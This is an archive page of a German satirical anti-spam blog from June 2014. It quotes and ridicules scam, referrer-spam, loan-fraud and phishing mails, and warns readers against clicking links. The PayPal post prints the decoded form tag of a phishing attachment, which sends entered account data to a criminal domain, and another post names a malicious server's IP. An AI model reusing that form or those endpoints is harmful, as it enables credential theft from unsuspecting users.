Autorenarchiv

HALLO

Dienstag, 17. Juni 2014

Oh wie schön, ein echter Qualitätsbetreff. Und auch noch auf einer Honeypot-Adresse. Das ist ganz sicher eine tolle Mail, die mein Leben bereichern wird…

Guten Tag, Ich habe Deine E-Mail-Adresse durch Online Dating Seite bekommen. Hast Du Dich an mich erinnert? Ich sende Dir ein Photo von mir. Wie findest Du mich? Hat es Dir gefallen, wie ich aussehe? Ich wuerde gern erfahren, was Du denkst. Ich wollte nur zu Dir weiter Kontakt haben. Du hast mir sehr gut gefallen und ich wuerde Dich naeher kennenlernen. Mein Name ist Jana. Ich bin schon zu lange single. Leider hat sich meine letzte Beziehung schlecht beendet! Deswegen war es fuer mich schwer neue Beziehung anzufangen. Ich habe mich entschlossen, im Internet einen Mann kenenzulernen. Ich habe Dich sehr gemocht und ich wuerde Dich kennenlernen. Ich weiss nicht, was daraus wird. Nun reicht es mir einfach einen neuen Freund zu machen. Bist Du nichts dagegen? Ich warte auf Deine Mail. Bitte erzaehl mir mehr ueber Dich. Es waere toll, wenn Du mir ein letztes Bild von Dir schicken wuerdest. Ist es moeglich?
Aufrichtig, Jana

Das Foto, das an die Mail angehängt war Guten Tag, Jana,

wie die triefende Süße eines Honigseims floss deine E-Mail in mein Postfach, Wogen der Wärme durchschüttelten mich, selbst mein schon verdorrt geglaubtes Herz fing wieder an, rhythmisch zu schlagen, pulsierend und pumpend. Was bin ich der von dir – vermutlich warst du im sirrenden Sang der Liebe schlechterdings zu verpeilt, eine genaue Angabe zu machen – nicht näher bezeichneten „Online Dating Seite“ dankbar dafür, dass sie dir meine Mailadresse gegeben hat, wenn ichs auch ein wenig schade finde, dass weder mein Name noch ein Nick dabei stand. Aber diese Bedenken wurden hinweggespült von deinem Foto. Ob ich mich an dich erinnere, fragst du mich? Aus tausend Träumen speist sich der Strom meiner Erinnerung, obgleich ich dich niemals gesehen habe (und mich wohl sicher an den engelsgleichen Klang deines Namens erinnert hätte, wenn unserer Leben Wege sich vor deiner Mail gekreuzt hätten); alle meine Wünsche kulminieren in dir. Wie soll ich dir nur sagen, was ich denke? Da ist kein Denken mehr. Da ist ein Strom zuckenden Lebens, der mich hinfortreißt in ein warmes Licht, das aus dir hervorströmt. Was für ein glücklicher Tag meines Lebens ist der Tag geworden, an dem du beschlossen hast, im Internet einen Mann kennenzulernen – und dich in deiner Liebe zielfestem Schritt nicht einmal an der Kleinigkeit gestört hast, seinen Namen nicht nennen zu können. Alle diese Grenzpfosten aus Staub überhüpft die Liebe! Ein winziges Foto von mir! Klar kann ich dir ein Foto von mir geben, und klar kannst du mit mir einen neuen Freund machen! Es ist ein Bild, dass ich gemacht habe, kurz nachdem ich deine Mail gelesen habe und um Worte rang – klein nur, aber es sagt dennoch mehr, als meine unvollkommen humpelnden Worte es jemals vermöchten. Allerdings antworte ich dir nicht mit einer Mail, sondern in meinem Blog Unser täglich Spam, damit auch die vielen anderen, von denen du gern etwas mehr hören möchtest, um ihnen ordentlich Geld rauszuleiern, nachdem du einen triefenden Schriftverkehr aufgebaut hast, von der überwältigend wahllosen Liebesbedürftigkeit wissen, die sich in dir verbirgt.

Ebenfalls aufrichtig, aber sowas von
Der Nachtwächter

Elias Schwerdtfeger We found broken images

Samstag, 14. Juni 2014

Hui, die haben meinen Namen rausgekriegt¹! 😀

Elias Schwerdtfeger

We found broken images

Hey, das habt ihr schon im Betreff gesagt. Tolle Anrede übrigens, einfach so den Namen zu nehmen.

IMG_62187044.jpg

View images

Es ist egal, auf welchen den beiden Links man klickt. Beide führen zu einem Webserver unter der IP-Adresse 194.226.148.40. Anders, als man auf dem ersten Blick glauben möchte, handelt es sich nich um eine weitere Pimmelpillen-Apotheke, sondern dort wird der Computer während und nach der üblichen Kaskade von Weiterleitungen… ähm… einer „gründlichen Sicherheitsprüfung“ unterzogen. Und wenn sich dabei irgendeine ausbeutbare Schwachstelle findet, hat man hinterher einen Computer anderer Leute auf dem Schreibtisch stehen.

Deshalb klickt man eben niemals in eine Spam.

Übrigens gibt es gegen diese Art der Übernahme einen Schutz, der wesentlich wirksamer als jedes Antivirus-Schlangenöl ist: Einfach nicht jeder dahergelaufenen Seite aus dem Web erlauben, JavaScript-Code im Browser auszuführen. Das Firefox-Addon „NoScript“ ermöglicht es, recht bequem zu verwalten, welchen Websites man dieses Privileg einräumen möchte.

¹Mein Name war Bestandteil der verwendeten Mailadresse.

Spam-Splitter

Donnerstag, 12. Juni 2014

Oh, doch wieder so viele…

Hallo […]

Ich kenne dich nicht.

Dear Beloved, […]

Ich kenne dich nicht.

Dear Poste Italiane Beneficiary, […]

Ich kenne dich nicht.

Sehr geehrter Stellenbewerber!

Ich kenne dich nicht.

Heavenly Greetings, […]

Ich kenne dich nicht und ich will dir das Blaue vom Himmel runterlügen.

Wenn ich diese Nachricht zu senden wollte, ist dies nicht einfach Zufall. Dies ist, weil Ihre e-Mail vom elektronischen Roboter gesichert meine WX.7AR BW ausgewählt wurde

Für einen Science-Fiction-Autor hats bei mir talentmäßig nicht gereicht, deshalb muss ich Spams formulieren.

Fühlen Sie sich jemals nervös und haben Angst, Sie könnten die Kontrolle verlieren oder verrückt werden?

Ja. Jedesmal, wenn ich meine Mail abhole.

We wish to inform you that the International Monetary Fund (I.M.F) has authorized us to remitte to you a total amount of Ђ500,000.00

Wir möchten dir weismachen, dass wir dir tausend lila Läppchen geben wollen, aber nicht einmal wissen, wie man so ein Währungssymbol wie „€“ in die Mail bekommt. Dass bei unseren Bestrebungen ein kyrillischer Buchstabe rausgekommen ist, unterstreicht unsere Internationalität.

Sorry my english is not to britght, […]

Wenns mal nur dein Englisch wäre, das nicht so helle ist.

Falls Sie oder jemand Ihrer Lieben an Tinnitus leidet, dann ist dies das wichtigste Schreiben, das Sie jemals gelesen werde.

Und falls sie oder jemand ihrer Verwandten und Bekannten an Schwierigkeiten im sprachlichen Ausdruck leidet, ist diese Spam die Bestätigung, dass sie nicht allein sein darin.

Have you received my mail i sent to you last week?

Wie?! Eine nur?!

Testen Sie generische Medikamente ohne Risiko […]

Wenn sie Glück haben, liefern wir gar nichts und sie bleiben am Leben.

Diese Nachricht wurde an Sie als an einen Bewerber um die Stelle von einem Obermanager in unserer Internet-Gesellschaft geschickt.

Diese Spam wurde von einem Obertrottel verfasst.

Bitte beachten Sie, dass Ihr online-Banking-Zugang bald abläuft

Der ist nämlich so ähnlich wie das Zeugs, was im Kühlschrank liegt und auch irgendwann abläuft.

Wir bieten persцnliche und Business-Darlehen ohne Sicherheiten bei 3% Zinsen, von 10.000 bis 90,000,000.00 in 1 Jahr bis 20 Jahren Laufzeit ьberall in der Welt.! JETZT BEWERBEN!

Klar, ganz große, tolle Bank!

Wichtig: keiner Anfangsgebühr wird benötigt um mit der Arbeit zu beginnen

Oh schön, um zu arbeiten, muss ich nicht extra etwas bezahlen.

Die oben genannten Anforderungen sind erforderlich.

Und mein druntergeschreibener Kommentar steht darunter.

Mit viel Achtung,
Komitee für Arbeitskräfte
Walter Owen

😆

Sent from my iPhone

Gelesen auf meinem Monitor.

No longer want to receive these emails? You can remove yourself here

Bitte sei so gläubig und sag dem asozialen Spammer, dass die Spam ankommt, wenn du keine mehr haben willst. Der wird deinen Wunsch schon respektieren. Das siehst du ja daran, wie er dir das Postfach vollmacht.

Ach! Entf! 😉

Suchbegriff-Referer-Spam

Dienstag, 10. Juni 2014

Ein Thema, dass alle Jahre wiederkommt, ist die Referer-Spam¹, die wegen ihres technischen und zunächst unsichtbaren Charakters oft unterschätzt wird und bei guter Machart als gezielter Angriff auch sehr gefährlich sein kann.

In diesem Fall scheint es jedoch mal wieder so zu sein, dass eine neue Generation von Anwendern von Blogs und CM-Systemen, die Referer-Spam noch nicht (oder nicht mehr) kennt, Plugins verbaut, um jene aktuellen Suchbegriffe irgendwo öffentlich auf der Website anzeigen zu lassen, mit denen sie von Lesern gefunden wurde. Deshalb simuliert diese aktuelle Referer-Spam Links von Suchmaschinen wie Google, Yahoo und Bing. In einer statistischen Auswertung der Serverlogs sieht die Spam unter den Suchbegriffen so aus:

Wenn diese gefälschten „Suchbegriffe“ irgendwo im Blog angezeigt werden, dann hat man sein Blog in eine Linkschleuder für betrügerische Pimmelpillen-Apotheker verwandelt – die übrigens ein hübsches, neues Layout für ihre Betrugssite gemacht haben. Auch die Bullshit-Firmierung „Trusted Tablets“ ist – zumindest in meinem täglichen Spameingang – recht frisch. Vermutlich gefällt es den Kriminellen nicht so gut, dass eine einfache Websuche nach ihrer Bullshit-Firmierung sofort den Betrug offenbart, weil das eben mies fürs „Geschäft“ ist. Da unter dem Begriff Tablets eher die Wischopäd-Computerchen gefunden werden, muss ich leider einräumen, dass diese trügerische „Firmierung“ gut gewählt ist, wenn sie auch eine eher triviale Abänderung früherer Namen von Betrugsapotheken ist.

Und weil ein vernünftiger Mensch – oder doch zumindest ein Mensch, der sich der Tatsache bewusst ist, dass für Links auf der eigenen Website gehaftet wird – niemals wollen kann, dass sein Blog zu einer Spamschleuder für derartige völlig unvermisst aus der Gesellschaft entfernbaren Gestalten wird, wird ein vernünftiger Mensch eben niemals für Spammer leicht manipulierbaren Dinge wie Referer oder die letzten Suchbegriffe irgendwo öffentlich anzeigen lassen.

Aber leider: Es kommt alle Jahre wieder.

¹Das englische Wort schreibt sich eigentlich „Referrer“, aber die falsche Schreibweise „Referer“ ist im HTT-Protokoll spezifiziert worden. Ich benutze hier den technischen Ausdruck.

Mr. philip

Dienstag, 10. Juni 2014

So nannte sich der Kommentator, der den folgenden handgeschriebenen Kommentar ausgerechnet auf Unser täglich Spam hinterlassen wollte:

Haben Sie einen Kredit? Wenn ja, senden Sie uns bitte konkurrieren (philipbrown991 (at) gmail (punkt) com) mit den Details unten Vollständiger Name: Betrag benötigt: Zeit: Telefonnummer: Land: Danke braun Mr.philip

Die Formatierung ist natürlich – mit Ausnahme der E-Mail-Adresse, die ich nicht so leicht benutzbar machen möchte – unverändert.

Die Frage, wie es im Kopfe eines Idioten aussieht, der allen Ernstes glaubt, dass es Menschen gibt, die wegen einer idiotischen und zudem stümperhaft formulierten und formatierten Spam in einem offenen Kommentarbereich anfangen würden, Darlehen zu beantragen, einen Datenstriptease vor einem Spammer zu machen und im nächsten Schritt auch noch Vorleistungen über Western Union zu erbringen, kann leider nur noch ein Metzger beantworten.

Kommentarspam dieser Machart habe ich beinahe täglich.

Kurz verlinkt

Montag, 9. Juni 2014

Die Erlöskrise der Print- und Onlinemedien führt zu Verzweiflungstaten, die an die Selbstabschaffung grenzen. Immer häufiger taucht sogenanntes “Native Advertising” auf […]

Weiterlesen bei Sprngsatz: Native Advertising – ein Missbrauch…

Angebot für kostenlosen Linktausch

Montag, 9. Juni 2014

Groteske Zeichnung eines Clowns. Dazu der Text: Du hast Post! Mail von Lena Bruschwitz! Solche Angebote lösen doch Verzückung aus! Und dann auch noch kostenlos. Ich muss nicht einmal dafür bezahlen, dass ich einen Link auf die Websites von Spammern setze. Was für eine Gnade!

Hallo,

Ich habe keine Ahnung, wer du bist, …

Ich möchte mich gerne vorstellen: mein Name ist Lena Bruschwitz,

…und du hast auch noch nie von mir gehört. Damit es so aussieht, als sei ich eine wirkliche Person, habe ich meinen ausgedachten Namen mit einem Profil bei LinkedIn verlinkt. Das ist ja fast so überzeugend, als hätte ich meinen Pass mitgesendet.

Da ich sehr viele hochqualitative seiten betreibe, möchte ich einen

kostenlosen Linktausch mit spam.tamagothi.de oder anderen Seite, die Sie besitzen, vorschlagen.

Vor einem Dreivierteljahr habe ich dir schon einmal das gleiche in den Maileingang gemacht, aber damals klang das Wort, das da jetzt fälschlich kleingeschrieben ist, noch ein bisschen anders: „Da ich sehr viele hochqualitative Glücksspielseiten betreibe…“ – nun, da sich nur die wenigsten Leute dazu bereit finden, unter den Bedingungen der Linkhaftung einen Anbieter von in der BRD illegalen Glücksspielen zu verlinken, habe ich das mal umformuliert. Und weil ich so eine Spezialexpertin mit Internet und so bin, ist mir bei meiner trivialen Bearbeitung der eine oder andere kaputt aussehende Absatz in den ansonsten gleichen Text geraten. Weil du musst wissen:

Sie werden sicher gerne hören, dass ich viele Ideen für einen Linktausch habe,

welcher sicherlich zu unserem Vorteil sein und unsere Rankings bei Google vorteilhaft beeinflussen wird.

Mit diesem Internetzeugs, da kenne ich mich echt mit aus!

Bitte lassen Sie mich wissen, ob Sie an weiteren Details interessiert sind oder andere Kommentare dazu haben.

Und jetzt sag mir bitte wenigstens, dass die Mail bei dir angekommen ist und gelesen wurde – und gib mir die Gelegenheit, dir weiteren Bullshit zu schreiben.

Ich freue mich, von Ihnen zu hören!

Ich verachte dich wie jeden anderen, dessen Website ich zur Litfaßsäule mit Reklame für illegale Angebote umbauen will.

Lena Bruschwitz

Das alles schreibt dir wie üblich ein ausgedachter Name mit…

http://www.deutschpagerank.com/
http://de.linkedin.com/pub/lena-bruschwitz/82/a13/1aa

…ganz tollen Websites.

Von der tollen Website von „Deutsch Page Rank“ habe ich gleich mal einen Screenshot für Interessierte und Genießer zu Flickr hochgeladen, damit auch jeder über den gratis, kostenlosen und gebührenfreien Linktausch lachen kann. Dieser wird präsentiert zusammen mit einer fröhlich-bunten Matrix aus allerlei appetitlichen App-Icons (jeweils in zwei Größen) und mit zwei lustigen Bildsalaten aus Browserlogos und Logos von Unternehmen, die garantiert nicht um Erlaubnis gefragt wurden, ob Spammer ihre Firmierung ein bisschen missbrauchen können.

Weil der Bullshit mit diesem Namen drunter mit der ermüdenden Regelmäßigkeit einer chinesischen Wasserfolter immer wieder mal ins Postfach geht, habe ich der guten Lena Bruschwitz mal ein Schlagwort spendiert – und das schaffen bei mir nur zertifizierte Idioten. Dass diese Idioten mit ihren Spamnummern meist auf Linktausch oder SEO machen, ist gewiss nur ein ganz dummer Zufall…

Konto-Status

Freitag, 6. Juni 2014

Nein, diese Mail kommt nicht von PayPal! Und sie ist ein weiteres Beispiel für die vielen schlechten Phishing-Mail, die man jeden verdammten Tag in seinem Posteingang (oder seinem Spamfilter) finden kann.

Lieber PayPal Kunde,

„Lieber Kunde“ ist genau der Name, den ich bei jedem Vertrag angebe.

Aufgrund der jüngsten betrgerischen [sic!] Aktivitäten haben wir ein neues Online-Sicherheitssystem für den maximalen Schutz der persönliche Daten unserer Kunden gestartet.

Wie man in einer HTML-formatierten E-Mail ein „ü“ codiert, wisst ihr nicht, aber vom tollen Online-Sicherheitssystem für den maximalen Schutz blahfaseln! Ihr seid mir schon ein paar Experten!

Nach dieser Tatsache, wird Ihnen angeboten, ihr PayPal-Konto zu aktualisieren.

Oh, was für ein tolles Angebot! 😀

Um Ihr PayPal-Konto zu aktualisieren, liegt Ihnen in Ihrer E-Mail Adresse ein Formular zur Verfügung [sic!].

Dieses „liegt zur Verfügung“ heißt, wenn man Deutsch spricht, übrigens „ist angehängt“. Aber woher soll ein armes Übersetzungsprogramm das wissen, wenn es mit dem alphabetisch sortierten Sprachgefühl eines Wörterbuches aus dem Russischen ins Deutsche übelsetzt.

Bitte laden Sie das Formular aus [sic!], rufen Sie ber [sic!] Ihren Internet-Browser und folgen Sie den Anweisungen auf dem Bildschirm.

Jemand, der Deutsch gekonnt hätte, hätte hier geschrieben: „Bitte speichern sie den Anhang und öffnen sie ihn anschließend in ihrem Browser“. Aber lassen wir das! Der Spammer mit der miesen Sprache und der noch mieseren Masche hängt also etwas an seine Spam und verlangt von den Empfängern allen Ernstes, dass sie diesen Anhang auch öffnen. Wer auch nur für zehn Cent Verstand hat, würde nicht auf Traum auf diese Idee kommen, zumal der Spammer auch noch…

Hinweis: Das Formular muss in einem modernen Browser geöffnet werden, dass [sic!] JavaScript aktiviert hat. (z.B. Internet Explorer, Mozilla Firefox)

…zwingend das Privileg haben will, Code im Browser auszuführen.

Der für den Spammer wichtige Code ist übrigens relativ harmlos, aber das werden die meisten Empfänger nicht nachvollziehen können, weil ihnen dafür das technische Verständnis fehlt. Er besteht aus folgender Zeile JavaScript, die ich hier als Screenshot meines Editors wiedergebe:

Screenshot eines Ausschnitts des betrügerischen HTML-Anhangs der Spam in meinem Editor

Aha, sagt sich der Spamgenießer, neuerdings schreibt man seinen HTML-Code nicht mehr direkt, sondern lässt ihn vom Browser mit einer Zeile JavaScript generieren, damit der kriminelle Müll wenigstens manchmal noch durch die Spamfilter geht. Was nach dem Aufruf von unescape() aus dem langen Text wird, sieht so aus:

<form method="post" onsubmit="return validateFormOnSubmit(this)" action="http://q.dnssv.tk/de/cgi-bin/webscr.php?cmd=_logout">

Was man in dieses Formular einträgt, geht also nicht in die PayPal-Domain, sondern in die deutlich weniger Vertrauen erweckende Domain t (punkt) dnssv (punkt) tk, die offensichtlich von Kriminellen kontrolliert wird. Das ist aber auch nicht weiter überraschend, denn das richtige PayPal versendet solche Mails nicht. Was hätte PayPal auch davon, wenn die Kunden…

…noch einmal jede Menge Daten mitteilen würden, die PayPal schon längst kennt?

Einmal ganz davon abgesehen, dass jemand bei PayPal wissen würde, dass einer dieser zwölf Abschnitte des Jahres auf Deutsch nicht als „Monath“ geschrieben wird und dass die „Postzahl“ hier eine „Postleitzahl“ genannt wird. Ein krimineller Spammer macht sich aber nicht die Mühe, sein Gestrokel auf Fehler abzusuchen, weil… tja… wenn er sich Mühe gäbe, er doch auch gleich arbeiten könnte.

Nach Abschluss dieser Phase [sic!] wird die Aktualisierung Ihres PayPal-Kontos normal funktionieren.

Und vorher auch. 😀

Wir entschuldigen uns für die Unannehmlichkeiten und danken Ihnen für Ihre Zeit. Für weitere Informationen kontaktieren Sie bitte den Kundenservice.

Oh, wie höflich! Ich könnte spucken vor Respekt!

Mit freundlichen Grüßen,
PayPal-Team.

Mit unfreundlichem Blick zurück
Spamessergemeinschaft.

Copyright ﾩ 1999-2014 PayPal. Alle Rechte vorbehalten.

(Und nein: Richtige Unternehmen, die so ein proklamiertes „geistiges Eigentum“ unter ihre E-Mails „rotzen“, sind in dieser intelligenzverachtenden Geste keinen Deut seriöser als dieser kriminelle Idiot von Phisher.)

PayPal (Europe) S.￠ r.l.et Cie, S.C.A.
Société en Commandite par Actions
Registered office: 22-24 Boulevard Royal, L-2449 Luxemburg
RCS Luxemburg B 118 349
PayPal Email ID PP58

Nun, von PayPal kommt diese Mail nicht. Zum Thema Phishing hat PayPal – lobenswerterweise! – selbst einen langen und guten Text auf seiner Website veröffentlicht, der das für jeden Nutzer völlig klar machen sollte – wenn er den Text denn auch liest.